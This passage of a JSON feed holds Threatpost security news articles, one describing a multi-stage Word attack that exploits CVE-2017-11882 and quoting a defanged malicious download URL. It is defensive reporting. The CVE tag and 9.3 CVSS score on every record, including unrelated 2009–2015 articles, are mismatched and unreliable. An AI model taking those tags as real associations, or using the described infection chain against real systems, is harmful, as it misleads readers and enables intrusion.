Microsoft DirectShow. An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn\u2019t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we\u2019ve verified that it is possible to direct calls to DirectShow specifically, even if Apple\u2019s QuickTime (which is not vulnerable) is installed.\n\nInterestingly, the vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.\n\nVulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. This [KB article provides fix-it button](<http://support.microsoft.com/kb/971778>) that automatically enables the workaround.\n\nIt also provides detailed instructions on using a managed script deployment for Windows shops.\n\nAlso see the [Security Research and Defense blog](<http://blogs.technet.com/srd/archive/2009/05/28/new-vulnerability-in-quicktime-parsing.aspx>) for more information.\n", "cvss3": {}, "published": "2009-05-28T21:16:23", "type": "threatpost", "title": "Microsoft warns of dangerous DirectShow flaw, attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "href": "https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/72744/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec who found that some attackers have been able to use command-and-control (C&C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrite the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered and recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection string uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from for the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d describes researchers.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\$v=office.12\$.aspx>)\u201c. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers a MSHTA command line that downloads and executes an HTML executable HTA file. Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "![Infiltrate](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065034/infiltrate.jpg)MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft and nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET to do the same, through modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**[![ASP.NET patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064944/aspnet_patch.jpg)](<https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/>)UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. The vulnerability affects a wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they\u2019re expecting exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communications Congress conference in Germany earlier this week, although some form of the problem has been known for several years. In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. The workarounds decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible for the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contact to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give into the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result were a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For the IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[![andrew_storms](https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you have like or disdain for Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today public disclosure of serious Microsoft security holes is now the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes today and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage.___\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "[![Duqu work-around](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064730/duqu_workaround.jpg)](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next 